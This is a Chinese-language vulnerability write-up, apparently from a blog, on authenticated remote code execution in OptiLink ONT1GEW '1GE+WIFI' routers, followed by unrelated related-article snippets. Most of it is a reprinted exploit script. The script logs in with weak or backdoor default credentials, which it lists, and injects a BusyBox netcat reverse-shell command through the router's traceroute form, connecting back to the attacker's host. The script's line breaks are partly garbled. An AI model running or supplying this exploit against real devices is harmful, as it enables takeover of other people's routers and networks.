0x01 漏洞描述

- 1GE+WIFI路由器远程代码执行漏洞 -

1GE+WIFI路由器存在命令执行漏洞。攻击者可通过弱口令登录后台,远程执行命令。

0x02 漏洞验证

通过网站标题可以确定是1GE+WIFI路由器系统界面。

通过网站尝试暴力破解/弱口令登录,获取到账号密码admin/admin

在 www.exploit-db.com 上,根据关键词1GE查找到远程命令执行脚本工具。

脚本工具源码:

# Exploit Title: OptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 - Remote Code Execution (Authenticated)
# Date: 23/03/2021
# Exploit Authors:  Developed by SecNigma and Amal.
# Vendor Homepage:  https://optilinknetwork.com/
# Version: ONT1GEW V2.1.11_X101 Build.1127.190306
# Mitigation: Ask the vendor to issue a router upgrade to Build.1653.210425 and above,
# as they do not release the firmware to the public for some unknown reason.
# Additional notes:
# Tested on the following configuration. Might be suitable for other OptiLink devices with Build <= 1127.190306.
# Device Name: ONT1GEW
# Software Version:  V2.1.11_X101
# Build Information: Build.1127.190306
# Chances are that XPONs of C-DATA company are affected too.
# Our research indicated that Optilink devices are just a rebranded version of C-Data.
# This exploit was tested on the following configuration.#!/usr/bin/python3import requests
import argparse
import redef is_login_success(r):match=re.findall("invalid username!|bad password!|you have logined error 3 consecutive times, please relogin 1 minute later!|another user have logined in",r.text)if match:return match# Default configuration
# Router address   = 192.168.101.1
# LPORT            = 9001
# Default Username = e8c  / Backdoor     /
# Default Password = e8c /  Credentials /parser= argparse.ArgumentParser()parser.add_argument("-t", "--target", dest = "target", default = "192.168.101.1", help="Target OptiLink Router IP")
parser.add_argument("-l", "--lhost", dest = "lhost" , help="Our Local IP to catch the shell!", required=True)
parser.add_argument("-lp", "--lport", dest = "lport", default = "9001", help="Our Local port for catching the shell!")
parser.add_argument("-u", "--user", dest = "user", default = "e8c", help="Username of Optilink Router")
parser.add_argument("-p", "--pass", dest = "passw", default = "e8c", help="Password of Optilink Router")
args = parser.parse_args()target=args.target,
lhost=args.lhost,
lport=args.lport,
user=args.user,
passw=args.passw# e8c:e8c are the backdoor administrator creds to Optilink devices
# Alternate backdoor credentials are  adsl:realtek, admin:admin.
user2="e8c"
passw2="e8c"home_url="http://"+target[0]+"/boaform/admin/formLogin"print("[+] Trying to authenticate...")# Authenticate ourselves first
data={'username':user, 'psd':passw}
r=requests.post(home_url,data)res=is_login_success(r)
if res:print("[-] Exploit failed when using the following credentials: "+str(user)+":"+str(passw)+"")print("[-] Exploit failed with the following error:")print(res)print("[!] Do you want to try to authenticate with the following credentials: "+str(user2)+":"+str(passw2)+" ?")val = input("Press y or n : ")if val[0].lower()=="y":print("[+] Trying to authenticate with the credentials "+str(user2)+":"+str(passw2)+"")# Authenticate ourselves with new credsdata={'username':user2, 'psd':passw2}r=requests.post(home_url,data)res2=is_login_success(r)if res2:print("[-] Exploit failed when using the following credentials: "+str(user2)+":"+str(passw2)+"")print("[-] Exploit failed with the following error:")print(res2)print("[-] Halting Execution.")exit()else:print("Received input "+val+"")print("[-] Halting Execution.")exit()print("[+] Looks like authentication was succesful!")
print("[+] Trying to fetch the WAN Name...")# Fetching Wan Name
# wan_name="1_INTERNET_R_VID_***"get_wan_url = "http://"+target[0]+"/diag_ping.asp"
r=requests.get(get_wan_url)match=re.findall("name=\"waninf\"><option value=\"(.*?)\">",r.text)
wan_name=match[0]print("[+] Initiating Exploitation. Don't forget to start the nc listener on port "+str(lport)+"..")
print("[+] I'm Waiting...Said Captain Jagdish *wink* *wink*")
print("[+] If everything went right, you should've gotten a shell right now!")# Starting Exploitation# The same vulnerability exists in formPing and formTracert.
# exploit_url = "http://"+target[0]+"/boaform/admin/formPing"
exploit_url = "http://"+target[0]+"/boaform/admin/formTracert"
# Found a new way to get reverse shell using mknod instead of mkfifo during the exploitation of this router :)
# BusyBox binary used by this router was very limited and didn't had mkfifo. So, we got creative to workaround it.
# The payload is available at swisskeyrepo's PayloadAllTheThings GitHub repo as Netcat BusyBox payload.
# https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox
post_data='target_addr="1.1.1.1+`rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+'+lhost[0]+'+'+lport[0]+'+>/tmp/f`"&waninf='+wan_name+'"'
r=requests.post(exploit_url,post_data)

利用脚本工具获取目标系统服务器权限。

0x03 漏洞修复

  1. 升级路由器至Build.1653.210425及更高版本。

1GE+WIFI路由器远程代码执行漏洞相关推荐

  1. 华硕路由器远程代码执行漏洞通告

    ## 背景 2020年08月03日,国内安全厂商极光无限发布了<漏洞公告 | 华硕(ASUS)家庭无线路由器远程代码执行0day>的风险通告. ## 风险等级 高危 ## 漏洞详情 未经过 ...

  2. c++获取一段代码的执行时间_微软IE浏览器JScript脚本引擎远程代码执行漏洞通告...

    文档信息 编号 QiAnXinTI-SV-2019-0022 关键字 IE JScript RCE 远程命令执行CVE-2019-1367 发布日期 2019年09月24日 更新日期 2019年09月 ...

  3. IoT僵尸网络Miori通过ThinkPHP远程代码执行漏洞进行传播

    转发开心,送你们一些IOT默认凭据表 Mirai变种"Miori"出现,通过Thinkphp5远程代码执行(RCE)漏洞传播 漏洞详细分析: Thinkphp5 远程代码执行漏洞事 ...

  4. Windows远程代码执行漏洞(CVE-2020-16898) 高危漏洞加固指南

    漏洞信息 序号 漏洞类型 风险等级 漏洞主机( 操作系统及版本) 1 Windows TCP/IP远程代码执行漏洞(CVE-2020-16898) 高 Windows 漏洞加固实施 漏洞1:Windo ...

  5. 华为路由器远程命令执行漏洞复现(CVE-2017-17215)

    华为路由器远程命令执行漏洞复现(CVE-2017-17215) 漏洞内容 这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值. CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞 ...

  6. 微软多个 Windows 系统存在远程代码执行漏洞(ICMP协议)(MPS-2023-1376)

    漏洞描述 Internet Control Message Protocol (ICMP) 协议是TCP/IP协议簇的一个子协议,用于在IP主机.路由器之间传递控制消息.raw socket 是一种网 ...

  7. 最新系统漏洞--D-LINK DIR-3040远程代码执行漏洞

    最新系统漏洞2021年11月14日 受影响系统: D-Link DIR-3040 1.13B03 描述: D-LINK DIR-3040是中国台湾友讯(D-Link)公司的一个路由器.提供连接网络的功 ...

  8. thinkphp5+远程代码执行_ThinkPHP5 5.0.23 远程代码执行漏洞

     漏洞描述 ThinkPHP是一款运用极广的PHP开发框架.其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程 ...

  9. ElasticSearch Groovy脚本远程代码执行漏洞

    什么是ElasticSearch? 它是一种分布式的.实时性的.由JAVA开发的搜索和分析引擎. 2014年,曾经被曝出过一个远程代码执行漏洞(CVE-2014-3120),漏洞出现在脚本查询模块,由 ...

最新文章

  1. Kettle系列文章二(安装配置Kettle+SqlServer+简单的输入输出作业)
  2. websocket工作原理
  3. activiti集成spring
  4. Vue指令之v-model和双向数据绑定
  5. 把一列数据分割成两列
  6. mysql函数封装_Mysql对文件操作的封装
  7. access和python哪个难学-access和python学哪个好一点
  8. 两数相加Python解法
  9. 1008. 数组元素循环右移问题 (20)-PAT乙级真题
  10. cuBLAS矩阵乘法性能分析(附代码示例)
  11. 8plus基带电源供电线路_iPhone7显示手机无服务还有感叹号,基带通病问题,你中招了吗?...
  12. java学生成绩管理系统(GUI界面+文件保存+排序)
  13. matlab时频分析
  14. 软件项目管理实践之日计划 .
  15. 《Linux那些事儿之我是USB》我是U盘(14)冰冻三尺非一日之寒
  16. 怎么查违章?查违章哪个软件最好?交管12123处理电子眼不用再跑交警队!
  17. C51单片机播放音乐《起风了》
  18. 【python爬虫实战】 001 技术路线图
  19. mysql 访问寄存器_汇编寄存器(内存访问)基础知识之三---mov指令
  20. ixgbe 驱动安装

热门文章

  1. 二进制的加法减法运算
  2. 力扣让我心碎的第四天
  3. 智慧水务物联网数据采集平台和营收管理平台建设
  4. L2正则化(Regularization)
  5. (征文模板参考)xx技能树/职业路线评测-xxxxxxxx
  6. AD域用户批量修改密码_大公司如何对企业AD域进行管理?
  7. 开发板udhcpc获取不到广电网络数字电视机顶盒ip问题解决
  8. 硬币组合问题python_关于硬币的python问题
  9. java邮件发送报错: Couldn‘t connect to host, port: smtp.exmail.qq.com, 25; timeout -1
  10. 挂载nfs提示:mount.nfs: access denied by server while mounting...